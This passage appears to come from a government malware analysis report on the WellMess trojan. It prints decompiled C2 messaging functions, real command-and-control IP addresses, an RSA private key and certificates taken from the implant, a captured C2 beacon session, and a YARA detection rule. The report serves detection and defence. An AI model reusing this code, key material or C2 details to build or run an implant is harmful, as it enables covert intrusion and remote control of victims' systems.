    {
       Thread.Sleep(new Random().Next(5, 20) * 1000);
       dictionary = transportProtocol.Post(Message, service1, true);
    }
   }
—End SendMessage Function—

The malware contains a function named “DownloadVar” which allows the malware to receive and parse messages from the remote operator. As illustrated, the malware will decrypt the body of these messages using the dynamically generated AES key mentioned above.

—Begin DownloadVar Function—
private static Dictionary<string, string> DownloadVar(
    string idMess,
    string askOrReply,
    string service,
    bool client)
   {
    List<string> message = new Transport().ReceiveMessage(idMess, askOrReply, service, client);
    try
    {
       Dictionary<string, string> dictionary = new ParseMessage(message[0]).Parse();
       if (!dictionary.ContainsKey("body"))
        dictionary.Add("body", message[1]);
       if (dictionary[nameof (service)] == "p" || dictionary["head"] == "C" || dictionary["head"] == "G" || !client)
        return dictionary;
       if (string.IsNullOrEmpty(dictionary["body"]))
        return dictionary;
       try
       {
        byte[] numArray = SymmCrypto.AES_Decrypt(Convert.FromBase64String(dictionary["body"]), Variable.keySymm);
        dictionary["body"] = !dictionary[nameof (service)].StartsWith("f") ? Message.UnPack(numArray) : Message.UnPackB(numArray);
        return dictionary;
       }
       catch (FormatException ex)
       {
        return (Dictionary<string, string>) null;
       }
    }
    catch (Exception ex)
    {
       return (Dictionary<string, string>) null;
    }
   }
—End DownloadVar Function—

Screenshots
Figure 2 - Data contained within the "cookie:" header of the initial traffic to the remote C2, being encrypted with RC6.

Figure 2 - Data contained within the "cookie:" header of the initial traffic to the remote C2, being encrypted with RC6.

Figure 3 - Malware generating hash unique for the victim system. This hash value in an encrypted and encoded format will be included in the "cookie:" header of the transmissions to the C2 server.

Figure 3 - Malware generating hash unique for the victim system. This hash value in an encrypted and encoded format will be included in the "cookie:" header of the transmissions to the C2 server.

Figure 4 - Encrypted "cookie:" header being formatted for transmission of the remote C2 server.

Figure 4 - Encrypted "cookie:" header being formatted for transmission of the remote C2 server.

85.93.2.116

Tags

command-and-control

Whois

Queried whois.ripe.net with "-B 85.93.2.116"...
% Information related to '85.93.2.0 - 85.93.2.255'
% Abuse contact for '85.93.2.0 - 85.93.2.255' is 'noc@lubnanet.com'
inetnum:        85.93.2.0 - 85.93.2.255
netname:        Arcompus-Medianet
descr:         Arcompus-Medianet
country:        LB
org:            ORG-AMIS1-RIPE
admin-c:        AMN61-RIPE
tech-c:         AMN61-RIPE
status:         ASSIGNED PA
mnt-by:         arcompusmedia-mnt
created:        2015-10-05T12:27:29Z
last-modified: 2015-10-05T12:27:59Z
source:         RIPE
organisation: ORG-AMIS1-RIPE
org-name:     Arcompus Medianet Int. SARL
org-type:     OTHER
address:        Baabda
address:        Lebanon
e-mail:         noc@lubnanet.com
abuse-c:        AC32241-RIPE
mnt-ref:        arcompusmedia-mnt
mnt-by:         arcompusmedia-mnt
created:        2015-10-02T07:33:53Z
last-modified: 2020-01-03T08:52:39Z
source:         RIPE
role:         Network Operations Centre
address:        15 Saed Fraiha,
address:        Baabda, 1003,
address:        Lebanon
e-mail:         noc@lubnanet.com
abuse-mailbox: noc@lubnanet.com
nic-hdl:        AMN61-RIPE
mnt-by:         arcompusmedia-mnt
created:        2015-10-02T07:36:29Z
last-modified: 2020-01-03T08:31:27Z
source:         RIPE
% Information related to '85.93.2.0/24AS203913'
route:         85.93.2.0/24
descr:         ArcompusMedia
origin:         AS203913
mnt-by:         arcompusmedia-mnt
created:        2015-12-15T16:27:03Z
last-modified: 2018-02-06T10:01:56Z
source:         RIPE
% This query was served by the RIPE Database Query Service version 1.97.2 (ANGUS)

Relationships
85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
Description

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 attempts to connect to the IP address.

5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb

Tags

trojan

Details
Name 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb
Size 6900178 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (SYSV)
MD5 3a9cdd8a5cbc3ab10ad64c4bb641b41f
SHA1 e45f89c923d0361ce8f9c64a63031860a76b2d10
SHA256 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb
SHA512 2d1d26081637c925fb6ae5f92b278f87a8253fd65a75c44fdc2c513a24dc9e0658c552ebc9c9c76c70ad948c60901e682184a833aae51a8c4d6220e883e05aef
ssdeep 49152:hPyt5H89G+YrbjVWMiUMNqb054dzNIdEp+rt1D5TvLlcpigaB5IDPmoFjPnMBbs0:hqHaQKNzVLlhLopfMlsnh8K54
Entropy 6.016965
Antivirus
Antiy Trojan/Linux.WellMess
BitDefender Trojan.Linux.Generic.173705
ESET a variant of Linux/WellMess.B trojan
Emsisoft Trojan.Linux.Generic.173705 (B)
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date= "2020-07-06"
        Last_Modified="20200706_1017"
        Actor="n/a"
        Category="Trojan"
        Family="WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

Relationships
5ca4a9f655... Connected_To 209.58.186.196
5ca4a9f655... Connected_To 141.98.212.55
Description

This artifact is an ELF 64-bit file. It has been identified as a variant of the WellMess malware family. When the file is executed, it attempts to create a C2 connection to one of the following IP addresses:

141.98.212.55 over Transmission Control Protocol(TCP) Port 53
209.58.186.196 over TCP Port 443

The initial C2 connection over port 53 will be a normal WellMess C2 session wherein parts of the message are encrypted with RSA and RC6. Whereas, the C2 session via port 443 will be fully secured via a Secure Sockets Layer (SSL) session.

The following keys and certificates are used to create the secure connection:

—Begin Keys and Certificates—

—Begin Certificate—
MIIDAzCCAeugAwIBAgICBnowDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu
aXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE4MTIxNjA4NTEzNloXDTI5
MDcxNjA3NTEzNlowHTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqnc
vGC1Re9BO3c+kCcUbVqyR2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQr
s6yR0xM7Ru1ObV/E6GdUGvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQ
IbLqmwrZ/Ud1AW+tZEs6kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm
/2AsD0N0rW8+DOoP7RiCPqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8o
O5qqikB2X+cq3rnSAaaBAD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQAB
o0EwPzAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUF
BwMBMA4GA1UdDgQHBAUBAgMEBjANBgkqhkiG9w0BAQsFAAOCAQEAK/n6JljR5epC
sUDpTz2GMGwnMHu0zOklOhv61AyfeTMC800G8/JbAe7ImueHSSWeV2Gg/tv10wrv
HKMNAkiPxaAK3wSl2391e3+e1SD/fmJNqBJVm2/OegzdezRyujTzwvsVuGIGJknH
ehutZmaL6GMYy9BtWs4n8tLgIn+vi7WofawNhPyIYqkvZvitqUhJ5IcIFDkeoiYb
9ThGlPI91X0c+6nxMJSLHdD6D8mVQKDP9CH9Kr7weXeFBE8AbVMi3/Jm6V791/jr
R5Z/j1JiU2o69Cj+31CfqXuIxd712MHSPoqhcXZov8w55MXgvX9NxY31G76X5R3h
71A5grjoww==
—End Certificate—

—Begin Certificate—
MIIDEDCCAfigAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwKTEOMAwGA1UEBhMFVHVu
aXMxCzAJBgNVBAoTAklUMQowCAYDVQQDEwEqMB4XDTE5MDIwNTExMjgyOVoXDTI5
MDIxNTExMjgyOVowKTEOMAwGA1UEBhMFVHVuaXMxCzAJBgNVBAoTAklUMQowCAYD
VQQDEwEqMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwgjuu797/ixV
8DOeOVSbxihX4RO9TI0CKnveqjzbb7a64fjJxIy/WxcpruLaeC1xhaWfxPeoMVJe
FZxdiE59uDLdhRJzItEmoRrxGqcZQ94K6G1YoNFBP7dGzn8J+GSP0JdWrHUGkpaq
W1xFl0zk33AuFwOCJmgQN6TD1lXgwQx90IZFsmBkeZYUQRaNEV6gwSzFQZauZ161
EUsW7WeOJ71uTOqC71NEtXypYFhqpUhmHAABPetoBO1MyBxseaQiji+m5XjWGMfu
0ZuXRpJ4qAGhwrVVbR4MoLWa8VYytGCcMPZoWedmvAOX5wl9Ol9JAL+g2hOY79rS
moF+Dc/S+QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAoQwHQYDVR0lBBYwFAYIKwYB
BQUHAwIGCCsGAQUFBwMBMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD
ggEBAJgenxhajyC5gNQR1e7umh6WWSS8P3ywqKMf1AEHjvrzKoJiUCRQ+BHAf4B0
TNQ4GpMIwDZBAMTmq80lEVZAy3M21Q4+iPzDBDaCV88bqD4AgIwnpxPoaAVUJoXJ
+tBQ7OSz6s8QYJWnMhSqcytj3pLrfUhgkjtBzScx18zL+l21V/v08y+geE3iw/Fh
blGDPjcLPYCuPSFpmy+X+/h0VSvQdV7KvS9B7g7KzA0eR7Y516xKBXmGV80PRJj2
lbi5v2CxdJHggTWt4q4/GB4PAHMFr/dz4qOsSKeryZJcSK2HODtl1Mr5zXdn3DB4
Gjt5XCFfp0SzMWhtOIes8N97+lQ=
—End Certificate—

—Begin RSA Private Key—
MIIEowIBAAKCAQEAsLZde+H/Bu3mA8xRa2c9DCmdYqncvGC1Re9BO3c+kCcUbVqy
R2t3mPrDpW4L94MDDHEF7LZ5VcXvNCTrfwRKI+ncoGQrs6yR0xM7Ru1ObV/E6GdU
GvlJMy2WKE3UsiHx2BJ2MnHvKa1yJSt5wjkMKEwqbUHQIbLqmwrZ/Ud1AW+tZEs6
kfEEuobNfIqLpZDLGT17FGnshqUa+iMnQ9b9Nax42kgm/2AsD0N0rW8+DOoP7RiC
PqsbcUanquxpLqpO9Zyw517wHLpImUn56B+dwnHVWb8oO5qqikB2X+cq3rnSAaaB
AD4JDVdQqS9poEXDnbBdGJczXSPFdx0UrOC5kQIDAQABAoIBAQCAXRhvQu00JV+u
Zp7GPAoWaaxP3T/g/wbutCtYfPhPUnP+M6HJS4Fm+NFhvBypQNvYD8nT94EQE2X9
JMyESaNpjxma0OkF7VdIUnH+xabwwF6Sy2xG48qOiJDI2jCk7Q92e4KshiLKzZla
8sfRlAsGwr0W/HWp5QOSeEF9QIj37udx8zoo68ROFLe3RIbc4VsjN4/rC46K1YHb
Oi9J+M2ScFWTjHYAu4Pvrjd8WqvPudF5FG+g4pF9qGhGhM27q37skNHr1REby/UU
QC7zzAUJB9c+Wr+iREDI3psItVzCL7ZXqHpG2qM3VdqMz+m+EN1vnfZWNX4EuaUa
Hp/YhOCZAoGBAOiS0Cs6RWtXEnNdSD3ap0M9yqwtrdV7iNcy4PGtIOTICN/3paVF
EatcOowqwpXiihZIEWDAe2QuvlocL4rIDHof42kInr7nM9pMHZia50qtSmGATwTN
3BbqTkK7O2wSbsZoZzRpTMB6kYonsw1xg02jTh+aXTMstpL/2I96v7AvAoGBAMKD
GxUKspKSF9xPkaR1jI3YOp5GYZxhkbR/O4cZgHEClbZlwkd+er63ecvxNoNOYmu9
Mdh98t+Dsnv1zrA3cFAxmsmwiAvc/tPpv3KQPVe2XbWza1o9vueHYpSoE/wwjxmK
WOV0Cazihoa0MV+lVyPRhKgCV1xLGcLc8kcD7AI/AoGAQ9WGaAVP+BXmaMWda4UZ
4g/kzEFqgWjNqc7KM1NG09PQWtrVcpXpqGx3Gyjhpmvz0Lnmb6zUkIzdslSkPTtK
AFjKsHj2LEItKo+m1jrgGTTgC/4rjgApIHnop6gKlePucWpEJ9JKs51MU9pubA5e
uMdX4vnYEzQIcGm1FWw8+rsCgYBuLVkvyAlyYHJHhoKWx0bAKdS6Rl+P9uxTcyZC
1j0cxjwLPwSW/puEX+ULkiwwoDu7j0UmveDOnoiBErDqu9xQcGifCfFl1t45JtQc
jntQranS/Dg4u3ThLJy4W6RGWzMTYnwMLHg2h3Fv56134e3ECi+8Aud9DcUfzYsm
kqAifQKBgHtMn87pL0wQ8eLpk/5+4fSVR5cCBS9/oBciO/g2g88Grb69g8PTyn99
bhiRlKDfAPnA/+gYtjCMNbyKkCy2Kf4UaWh3cMJnGafFTOci2Uve4zj/SSePAp3O
viyz2EuMK0ZZc4nNBK6leRFq4GEgwZSr7RakpKU1t3vlhMrRDuSI
—End RSA Private Key—

—Begin Public Key—
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArRiKDue9YA6DUzYu6WQv
oWOxp8wel/Ws/5jK1Xsv2f8lJwUDxM+zT4dGL3ZyJLMkbBQk8HyvAm+6331M47vF
sbva2BCzQxdEWO9ey3LnhCtpQOgjypf1QcPy4Kx6jj2BiVEtPP9YBa75QkUNR0oO
0n6PKFP8SX6Mv0UyHqS3tsa8D21nm2hf3rO7sqBXevs9xdvKbxiKLJxY6WEvKAGH
7Q09rndwr4b7gJ56GZGBwVeqkoVmRFM/nNq9aymTOe4PNRdOcpYK7AoT/QjA0IvO
Q5XOapb3iJWHLlxCGfBRT+ISVfg4PVdXev2wsXFe6h3McXHoN7FZgyo10XiP2QZU
RQIDAQAB
—End Public Key—

—End Keys and Certificates—

The program uses TCP ports 53 and 443 because of the likelihood that these ports would be open on the router. However, outbound TCP connections initiated on TCP port 53 would be unusual, because typically, this port is reserved for the Domain Naming System (DNS) and outbound queries are done using the User Datagram Protocol (UDP) protocol or TCP, while inbound answer records may use both. This activity could be flagged as suspicious.

The malware contains functions that are similar in design to the .NET version of WellMess (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854). Figures 5-7 detail that both implants contained similar functions named “Work” and “SendMessage”.

In addition, this sample contains a function named “botlib_Exec”, which is very similar in design and purpose to the function named “Command” within the file 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854. Both implants utilize the same REGEX value to parse executable scripts from data received from a remote operator via a C2 session. (Figure 8).

A primary difference between the implants is that this version initially attempts a C2 session to IP address 141.98.212.55 over port 53. If this C2 server is not available, it will attempt an SSL secured (port 443) C2 session with the C2 IP address 209.58.186.196. The presence of an RSA private key within this implant is likely to facilitate this secure SSL session.

—Begin WellMess C2 session—
POST / HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip

DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D asij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV CcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9 KucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk yPmCpN. 2X35q5 JhXg    
—End WellMess C2 Session—

Screenshots